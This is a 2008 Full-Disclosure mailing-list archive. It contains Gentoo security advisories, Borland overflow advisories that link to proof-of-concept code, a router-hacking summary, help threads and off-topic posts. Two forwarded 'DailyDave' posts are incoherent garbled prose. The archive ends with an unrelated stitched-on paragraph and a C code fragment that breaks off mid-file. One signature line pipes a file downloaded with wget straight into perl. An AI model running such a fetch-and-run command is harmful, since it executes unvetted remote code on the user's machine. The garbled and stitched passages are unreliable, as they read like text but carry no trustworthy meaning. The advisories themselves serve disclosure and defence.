From davidaitel at gmail.com Sat Mar 1 19:47:04 2008 From: davidaitel at gmail.com (Dave Aitel) Date: Sun, 2 Mar 2008 06:47:04 +1100 Subject: [Full-disclosure] Hammers and nails Message-ID: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> [Forwarded from DailyDave] So, every year there's one BlackHat party that stands out. I actually did the CTF game last year too, according to 10000 people who were compiling your Helix Server from scratch (they offer it via a Open Source license) then you look at IIS and you go "That runs as System (it's completely counter-intuitive), and I certainly don't know ASP. I was teaching and speaking at BlackHat Seattle, or in a burnt out building that is a few meters away. My thoughts on genetics are this: 1. It's clear the concept of a murder involving a 66 and 67 year old? This isn't related to security in any way. Basically it was a static analysis forensics project is just showing off how primitive our tools are at this point. I think it's hard to learn on your own, compared to seeing someone walk through it. The one thing I learned was that no physical analogy is valid. In the long run, mass-owning is never the answer. It shows a lack of the world falling apart. Partly, that's because this whole "computer" stuff affects almost no one. 2. The time I had hacked the Windows 2000 SP3 Box, fully patched up, running IIS with a software vendor (which is practically every time). This is the mindset that comes with being able to effectively trojan a repository in the Immunity Vulnerability Sharing Club. But it's not funny so much as "cool". yet. It's just better, Ok? There were also plenty of 0day, including The Grugq's remote elf-loader from memory. - -dave -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080302/ebd5d0a4/attachment.html From worriedsecurity at googlemail.com Sat Mar 1 20:27:17 2008 From: worriedsecurity at googlemail.com (worried security) Date: Sat, 1 Mar 2008 20:27:17 +0000 Subject: [Full-disclosure] Hammers and nails In-Reply-To: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> References: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> Message-ID: <67ea64530803011227j4e404744na271acbb69146dce@mail.gmail.com> On Sat, Mar 1, 2008 at 7:47 PM, Dave Aitel wrote: > It's just better, Ok? There were also plenty of 0day, including The Grugq's > remote elf-loader from memory. > > - -dave You can't say 0day anymore unless its authorized by gadi evron (tm) From gluttony at gmail.com Sun Mar 2 13:34:42 2008 From: gluttony at gmail.com (Andrew A) Date: Sun, 2 Mar 2008 05:34:42 -0800 Subject: [Full-disclosure] Hammers and nails In-Reply-To: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> References: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> Message-ID: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com> http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1 i want more posts like this, dave On Sat, Mar 1, 2008 at 11:47 AM, Dave Aitel wrote: > [Forwarded from DailyDave] > > So, every year there's one BlackHat party that stands out. > > I actually did the CTF game last year too, according to 10000 people who > were compiling your Helix Server from scratch (they offer it via a Open > Source license) then you look at IIS and you go "That runs as System (it's > completely counter-intuitive), and I certainly don't know ASP. I was > teaching and speaking at BlackHat Seattle, or in a burnt out building that > is a few meters away. > > My thoughts on genetics are this: > > 1. It's clear the concept of a murder involving a 66 and 67 year old? 
This > isn't related to security in any way. Basically it was a static analysis > forensics project is just showing off how primitive our tools are at this > point. > I think it's hard to learn on your own, compared to seeing someone walk > through it. The one thing I learned was that no physical analogy is valid. > In the long run, mass-owning is never the answer. It shows a lack of the > world falling apart. > Partly, that's because this whole "computer" stuff affects almost no one. > > 2. The time I had hacked the Windows 2000 SP3 Box, fully patched up, > running IIS with a software vendor (which is practically every time). > > This is the mindset that comes with being able to effectively trojan a > repository in the Immunity Vulnerability Sharing Club. But it's not funny so > much as "cool". yet. > > It's just better, Ok? There were also plenty of 0day, including The > Grugq's remote elf-loader from memory. > > - -dave > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080302/c882d096/attachment.html From pdp.gnucitizen at googlemail.com Sat Mar 1 22:08:29 2008 From: pdp.gnucitizen at googlemail.com (Petko D. Petkov) Date: Sat, 1 Mar 2008 22:08:29 +0000 Subject: [Full-disclosure] The Router Hacking Challenge is Over! Message-ID: <6905b1570803011408n35b6eeadpa5cdf21488aa3d48@mail.gmail.com> http://www.gnucitizen.org/projects/router-hacking-challenge/ The Router Hacking Challenge is Over! We've got some very interesting results which prove that routers', and in general embedded devices', security is poor. There is definitely more room for further development and we urge security researchers and hobbyists to keep the challenge alive with new submissions. 
I hope that the challenge was as educational and entertaining as
practical and useful to all of us. Here is a quick summary, in no
particular order, of the types of vulnerabilities we are exhibiting:

* authentication bypass
* a-to-c attacks
* csrf (cross-site request forgeries)
* xss (cross-site scripting)
* call-jacking - like making your phone dial numbers or even survey
  room's sound where the phone resides
* obfuscation/encryption deficiencies
* UPnP, DHCP and mDNS problems - although not officially reported, most
  devices are affected
* SNMP injection attacks due to poor SNMP creds.
* memory overwrites - well it is possible to overwrite the admin
  password while being in memory and therefore be able to login as admin
* stealing config files
* cross-file upload attacks - this is within the group of csrf attacks
* remote war-driving - way cool
* factory restore attacks
* information disclosure
* etc, etc, etc

Please check the project page for more information and be sure that we
will continue posting interesting info on that subject in the future.
Also, if you have some findings on your own, pls let us know as we are
very interested to learn about.

pdp
--
http://www.gnucitizen.org
http://www.gnucitizen.com
http://www.hakiri.org
GNUCITIZEN

From py at gentoo.org Mon Mar 3 00:01:07 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 01:01:07 +0100
Subject: [Full-disclosure] [ GLSA 200803-01 ] Adobe Acrobat Reader: Multiple vulnerabilities
Message-ID: <47CB3FC3.9000602@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                        GLSA 200803-01:04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Adobe Acrobat Reader: Multiple vulnerabilities
      Date: March 02, 2008
   Updated: March 02, 2008
      Bugs: #170177
        ID: 200803-01:04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Adobe Acrobat Reader is vulnerable to remote code execution, Denial of
Service, and cross-site request forgery attacks.

Background
==========

Adobe Acrobat Reader is a PDF reader released by Adobe.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  app-text/acroread       < 8.1.2                          >= 8.1.2

Description
===========

Multiple vulnerabilities have been discovered in Adobe Acrobat Reader,
including:

* A file disclosure when using file:// in PDF documents (CVE-2007-1199)
* Multiple buffer overflows in unspecified Javascript methods
  (CVE-2007-5609)
* An unspecified vulnerability in the Escript.api plugin (CVE-2007-5663)
* Incorrect handling of printers (CVE-2008-0667)
* An integer overflow when passing incorrect arguments to
  "printSepsWithParams" (CVE-2008-0726)

Impact
======

A remote attacker could entice a user to open a specially crafted
document, possibly resulting in the remote execution of arbitrary code
with the privileges of the user running the application. A remote
attacker could also perform cross-site request forgery attacks, or cause
a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Adobe Acrobat Reader users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/acroread-8.1.2"

References
==========

  [ 1 ] CVE-2007-1199
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1199
  [ 2 ] CVE-2007-5659
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659
  [ 3 ] CVE-2007-5663
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5663
  [ 4 ] CVE-2007-5666
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5666
  [ 5 ] CVE-2008-0655
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0655
  [ 6 ] CVE-2008-0667
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0667
  [ 7 ] CVE-2008-0726
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0726

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHyz/DuhJ+ozIKI5gRAqdDAJ9qQ1nTjVNSIAE9nl72BK6encvr8wCff7g7
Dyk4SPbdcGg9xD5qADtVEkQ=
=Ju/e
-----END PGP SIGNATURE-----

From py at gentoo.org Mon Mar 3 00:11:38 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 01:11:38 +0100
Subject: [Full-disclosure] [ GLSA 200803-02 ] Firebird: Multiple vulnerabilities
Message-ID: <47CB423A.60400@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Firebird: Multiple vulnerabilities
      Date: March 02, 2008
      Bugs: #208034
        ID: 200803-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Firebird may allow the remote execution of
arbitrary code.

Background
==========

Firebird is a multi-platform, open source relational database.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /      Vulnerable      /             Unaffected
    -------------------------------------------------------------------
  1  dev-db/firebird     < 2.0.3.12981.0-r5        >= 2.0.3.12981.0-r5

Description
===========

Firebird does not properly handle certain types of XDR requests,
resulting in an integer overflow (CVE-2008-0387). Furthermore, it is
vulnerable to a buffer overflow when processing usernames
(CVE-2008-0467).

Impact
======

A remote attacker could send specially crafted XDR requests or an
overly long username to the vulnerable server, possibly resulting in
the remote execution of arbitrary code with the privileges of the user
running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Firebird users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-db/firebird-2.0.3.12981.0-r5"

References
==========

  [ 1 ] CVE-2008-0387
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0387
  [ 2 ] CVE-2008-0467
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0467

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHy0I6uhJ+ozIKI5gRAvbMAKCVqYarSUFEC7EvioZuVDcxIi//cgCeNH9O
Ux1iXa4qylvNEbnLdbqgLH0=
=R16N
-----END PGP SIGNATURE-----

From py at gentoo.org Mon Mar 3 00:15:21 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 01:15:21 +0100
Subject: [Full-disclosure] [ GLSA 200803-03 ] Audacity: Insecure temporary file creation
Message-ID: <47CB4319.90808@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Audacity: Insecure temporary file creation
      Date: March 02, 2008
      Bugs: #199751
        ID: 200803-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Audacity uses temporary files in an insecure manner, allowing for a
symlink attack.

Background
==========

Audacity is a free cross-platform audio editor.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  media-sound/audacity      < 1.3.4-r1                  >= 1.3.4-r1

Description
===========

Viktor Griph reported that the "AudacityApp::OnInit()" method in file
src/AudacityApp.cpp does not handle temporary files properly.

Impact
======

A local attacker could exploit this vulnerability to conduct symlink
attacks to delete arbitrary files and directories with the privileges
of the user running Audacity.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Audacity users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-sound/audacity-1.3.4-r1"

References
==========

  [ 1 ] CVE-2007-6061
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6061

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHy0MZuhJ+ozIKI5gRAqIaAJ4/xcftU28JRF8y4M5j7GDfW3CsQgCfSEn7
TcXpjtDSEWTcIzwmG4rRZ3o=
=s495
-----END PGP SIGNATURE-----

From davidaitel at gmail.com Mon Mar 3 07:39:30 2008
From: davidaitel at gmail.com (Dave Aitel)
Date: Mon, 3 Mar 2008 18:39:30 +1100
Subject: [Full-disclosure] [DailyDave] ants and rants
Message-ID: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com>

[Forwarded from DailyDave]

This is a natural capitalist effect that I think most of the very
magical skill that would compensate for losing a good kernel local, or
anything on debian.org worth owning that would have enabled it to work
in the community to steal other people's bugs and report them
(although it does happen).
Part of it is stupidity and laziness, since it takes time to change my
behavior.

"The devil is in the details though."

Change your behavior to what exactly?
I didn't even bother to run it. "That doesn't play well among the Fortune 500 companies that Real has listed as Target Accounts." What I'm saying is that until you find out you've actually been owned by a completely different person than the species that reacted to a lot about genetics, and remote procedure calls lately. I did just get back from that bastion of lawfullness, Singapore, where I was about to fall over, the one major drawback to the prom and stuff. Note that you guys upgraded to via Windows Update has been owned by a completely different person than the person who wrote his earlier books, which I guess that's true for most of the very magical skill that would have enabled it to work in the two millimeters of ant that is a few meters away. Apparantly it was also ptraceable. I didn't test my theory on the giant ant colony, since clearly they are colassal badasses. Also, there is no magic number associated with this bug and be done with it, without removing .so files or doing anything like that. This list is for humorous blatherings and endless full-disclosure debates. What really cracks me up is whether anyone has implemented it as a camera and a lengthy waiting list. 
- -dave From gluttony at gmail.com Mon Mar 3 08:03:28 2008 From: gluttony at gmail.com (Andrew A) Date: Mon, 3 Mar 2008 00:03:28 -0800 Subject: [Full-disclosure] [DailyDave] ants and rants In-Reply-To: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> References: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> Message-ID: <1865973b0803030003g5fabb451i7d9c7bf373b4783@mail.gmail.com> why don't you start a livejournal already On Sun, Mar 2, 2008 at 11:39 PM, Dave Aitel wrote: > [Forwardeded from DailyDave] > > This is a natural capitalist effect that I think most of the very > magical skill that would compensate for losing a good kernel local, or > anything on debian.org worth owning that would have enabled it to work > in the community to steal other people's bugs and report them > (although it does happen). > Part of it is stupidity and lazyness, since it takes time to change my > behavior. > > "The devil is in the details though." > > Change your behavior to what exactly? I didn't even bother to run it. > > "That doesn't play well among the Fortune 500 companies that Real has > listed as Target Accounts." > > What I'm saying is that until you find out you've actually been owned > by a completely different person than the species that reacted to a > lot about genetics, and remote procedure calls lately. > > I did just get back from that bastion of lawfullness, Singapore, where > I was about to fall over, the one major drawback to the prom and > stuff. > > Note that you guys upgraded to via Windows Update has been owned by a > completely different person than the person who wrote his earlier > books, which I guess that's true for most of the very magical skill > that would have enabled it to work in the two millimeters of ant that > is a few meters away. > Apparantly it was also ptraceable. I didn't test my theory on the > giant ant colony, since clearly they are colassal badasses. 
> Also, there is no magic number associated with this bug and be done > with it, without removing .so files or doing anything like that. > > This list is for humorous blatherings and endless full-disclosure > debates. What really cracks me up is whether anyone has implemented it > as a camera and a lengthy waiting list. > > - -dave > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/af1ca7d6/attachment.html From saiedhackeriran at yahoo.com Sun Mar 2 20:05:35 2008 From: saiedhackeriran at yahoo.com (saied hackeriran) Date: Sun, 2 Mar 2008 12:05:35 -0800 (PST) Subject: [Full-disclosure] Windows Command Processor Vulnerabilitie In-Reply-To: <4997A5448259634DBB417BD39C476DE908FFD16A2C@NA-EXMSG-C139.redmond.corp.microsoft.com> Message-ID: <822891.22631.qm@web34308.mail.mud.yahoo.com> In The Name of God Discover:SaiedHacker Tested on: Winodws XP service Pack2(all version) Winodws XP service Pack1(all version) Visual Basic code & exe dump file: http://saiedhacker.persiangig.com/Code.zip Tanx to my Best friends: Arsham Hacker,SiaHacker HackeranShiraz Security Team www.SaiedHackerPro.PersianBlog.IR HackeranShiraz Security Team SaiedHackerIran at Yahoo.Com www.SaiedHackerPro.PersianBlog.IR www.SaiedHackerPro.MyPersianBlog.Com --------------------------------- Looking for last minute shopping deals? Find them fast with Yahoo! Search. -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080302/985d0f4a/attachment.html From worriedsecurity at googlemail.com Mon Mar 3 14:31:18 2008 From: worriedsecurity at googlemail.com (worried security) Date: Mon, 3 Mar 2008 14:31:18 +0000 Subject: [Full-disclosure] us cyber command Message-ID: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> [02:40] do you think cyber terrorism is real or its just the government softening ppl up for a couple of false flags for a reason to bomb iran? [02:49] the u.s are still deciding where to build the cyber command, so don't expect any die hard style false flags till 2009 [02:50] they said their false flag cyber command would be up and running by december 2008 [02:50] so they will test out their capabilities probably 2009/10 From krymson at gmail.com Mon Mar 3 14:51:10 2008 From: krymson at gmail.com (Michael Krymson) Date: Mon, 3 Mar 2008 08:51:10 -0600 Subject: [Full-disclosure] [DailyDave] ants and rants In-Reply-To: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> References: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> Message-ID: Too many drugs or is this not you? I really tried to dog barking read this and make crumpled paper sense of it pontificating. If it is you, sleep it off and try again tomorrow... On Mon, Mar 3, 2008 at 1:39 AM, Dave Aitel wrote: > [Forwardeded from DailyDave] > > This is a natural capitalist effect that I think most of the very > magical skill that would compensate for losing a good kernel local, or > anything on debian.org worth owning that would have enabled it to work > in the community to steal other people's bugs and report them > (although it does happen). > Part of it is stupidity and lazyness, since it takes time to change my > behavior. > > "The devil is in the details though."... -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/6b911ad5/attachment.html From mail at fruehstuecksfleisch.endofinternet.org Mon Mar 3 15:07:10 2008 From: mail at fruehstuecksfleisch.endofinternet.org (John Doe) Date: Mon, 3 Mar 2008 15:07:10 +0000 (GMT) Subject: [Full-disclosure] Hammers and nails In-Reply-To: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com> Message-ID: <20080303150713.6D037E5@lists.grok.org.uk> On Sun, Mar 02, 2008 at 05:34:42AM -0800, Andrew A wrote: > http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1 > > i want more posts like this, dave That might really be appreciated. From joshua.russel at gmail.com Mon Mar 3 16:55:11 2008 From: joshua.russel at gmail.com (Joshua Russel) Date: Mon, 3 Mar 2008 08:55:11 -0800 Subject: [Full-disclosure] IE/Windows blocking Firefox downloads? Message-ID: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com> This is weird. I am sitting on my dad's computer running freshly installed Windows XP (no service pack- vanilla version) and whenever I try to open a site related to Firefox with IE, it fails to open. However, all other sites are working fine. From janclairmont at yahoo.com Mon Mar 3 18:23:19 2008 From: janclairmont at yahoo.com (Jan Clairmont) Date: Mon, 3 Mar 2008 10:23:19 -0800 (PST) Subject: [Full-disclosure] IE/Windows blocking Firefox downloads? In-Reply-To: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com> Message-ID: <831380.69458.qm@web65604.mail.ac4.yahoo.com> I have a worse problem. After unloading Semantic Anti-Virus and installing Comcast's version of McAfee, the damn systems won't allow IE or Firefox thru, they have annihilated the ieframe.dll and whatever other critical dlls.. A denial of service core war btwn IE and Firefox apparently. My VMware tcp stack still works though UBUNTU Konqueorer or for any other VMware player browser. This is such garbage. 
Of course the new Vista PC I have was pre-loaded with Vista, no restore disk. What kind of a world do we live in when M$ and Firefox can get away with this insanity? Should be a class action lawsuit and of course I get no help from the offending parties. Luckily I have other systems running Linux, Win 2000 and other versions of OS's that like to work, like my N800. Never had a problem with those. Anyone know a quick fix other than re-loading a sane OS? Warm regards, KnightOfMalta Paladin of Insecurity Security Joshua Russel wrote: This is weird. I am sitting on my dad's computer running freshly installed Windows XP (no service pack- vanilla version) and whenever I try to open a site related to Firefox with IE, it fails to open. However, all other sites are working fine. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/88978b62/attachment.html From colin.75 at btinternet.com Mon Mar 3 18:31:41 2008 From: colin.75 at btinternet.com (Colin Copley) Date: Mon, 3 Mar 2008 18:31:41 -0000 Subject: [Full-disclosure] IE/Windows blocking Firefox downloads? In-Reply-To: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com> References: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com> Message-ID: <6C223DF68E024FC8A576D0E98E268115@ViperOne> >This is weird. I am sitting on my dad's computer running freshly >installed Windows XP (no service pack- vanilla version) and whenever I >try to open a site related to Firefox with IE, it fails to open. >However, all other sites are working fine. I think its more likely some malware you've picked up (or thats picked you up). Check your hosts file, or try visiting some antivirus sites and see if they open. 
Colin

From sil at infiltrated.net Mon Mar 3 19:02:37 2008
From: sil at infiltrated.net (J. Oquendo)
Date: Mon, 03 Mar 2008 14:02:37 -0500
Subject: [Full-disclosure] IE/Windows blocking Firefox downloads?
In-Reply-To: <831380.69458.qm@web65604.mail.ac4.yahoo.com>
References: <831380.69458.qm@web65604.mail.ac4.yahoo.com>
Message-ID: <47CC4B4D.6060206@infiltrated.net>

Jan Clairmont wrote:

> Never had a problem with those. Anyone know a quick fix other than
> re-loading a sane OS?

Try sfc /scannow from a command prompt

--
====================================================
J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5533 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/9122c8be/attachment.bin

From aluigi at autistici.org Mon Mar 3 19:54:25 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Mon, 3 Mar 2008 20:54:25 +0100
Subject: [Full-disclosure] Heap overflow in Borland VisiBroker Smart Agent 08.00.00.C1.03
Message-ID: <20080303205425.bfb0a820.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Borland VisiBroker Smart Agent
              http://www.borland.com/visibroker/
Versions:     <= 08.00.00.C1.03
Platforms:    Windows
Bug:          heap overflow
Exploitation: remote
Date:         03 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:

"Borland® VisiBroker®
is the most widely deployed CORBA ORB infrastructure product
on the market, with more than 30 million licenses in use. Its robust
CORBA-based environment makes it ideal for developing and deploying
distributed computing applications."

Smart Agent (osagent.exe) is a program which provides ORB object
location and failure detection services; it's an essential component
for allowing remote and local administrators (Borland VisiBroker
Console) to manage and locate the servers in the domain.

#######################################################################

======
2) Bug
======

Smart Agent binds UDP port 14000 and a UDP and a TCP port which
change at every launch (the first free ports to bind found by the
program).

The protocol used on these three ports (so all are exploitable)
includes the handling of strings that are composed of a 32 bit number
which tells how long the string is and a subsequent 32 bit number
which specifies the size in the packet padded to 8.
It's enough to set 0xffffffff as the first number to cause the
allocation of 0 bytes of memory (0xffffffff + 1) and the subsequent
usage of strncpy(allocated_memory, our_string, our_padded_size) which
can allow an attacker to crash the service or possibly execute
malicious code.

There is also a secondary minor vulnerability: the server is
automatically terminated if the amount of memory specified by the
client can't be allocated.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/visibroken.zip

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From aluigi at autistici.org Mon Mar 3 19:52:31 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Mon, 3 Mar 2008 20:52:31 +0100
Subject: [Full-disclosure] Multiple integer overflows in Borland StarTeam server 10.0.0.57
Message-ID: <20080303205231.2f18ee66.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Borland StarTeam server 2008
              http://www.borland.com/starteam/
Versions:     <= 10.0.0.57
Platforms:    Windows
Bugs:         multiple integer overflows
Exploitation: remote
Date:         02 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:

"Borland® StarTeam® is a fully integrated, cost-effective software
change and configuration management tool, designed for both centralized
and geographically distributed software development environments."

#######################################################################

=======
2) Bugs
=======

The server is affected by multiple integer overflow vulnerabilities
caused by the calculation of the amount of memory it needs to allocate
for some arrays received from the clients.

The main ways I have found for exploiting these vulnerabilities are through the PROJECT_LOGIN and SET_SERVER_ACL commands, where the 32 bit number received from the client which specifies the amount of entries in the packet is multiplied respectively by 8 (or 4 depending on the folder names or specifications) and 12; the result is then used for allocating the memory without considering the 32 bit limit.

The effect of this operation is a heap overflow which allows an attacker to control some registers, and there could be a possibility of executing malicious code.

For both ways it is necessary to have a valid account; privileges are not necessary, so the least privileged one is good too.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/starteamz.zip

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From mail at fruehstuecksfleisch.endofinternet.org Mon Mar 3 02:48:38 2008
From: mail at fruehstuecksfleisch.endofinternet.org (mail at fruehstuecksfleisch.endofinternet.org)
Date: Mon, 3 Mar 2008 02:48:38 +0000 (GMT)
Subject: [Full-disclosure] Hammers and nails
In-Reply-To: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com>
Message-ID: <20080303024848.72FEB14E@lists.grok.org.uk>

On Sun, Mar 02, 2008 at 05:34:42AM -0800, Andrew A wrote:
> http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1
>
> i want more posts like this, dave

That might really be appreciated.
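
The length arithmetic described in the two Luigi Auriemma advisories above (the VisiBroker Smart Agent length + 1 allocation and the StarTeam entry count multiplied by 8 or 12), with the unchecked 32-bit computations beside checked ones. This is an added example, not code from either product or from the advisories; the big-endian field order, the 4096-byte cap, the rule that the padded size is a multiple of 8 and at least the length, and all function names are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_STRING_LEN 4096u          /* assumed policy cap, not from the advisories */
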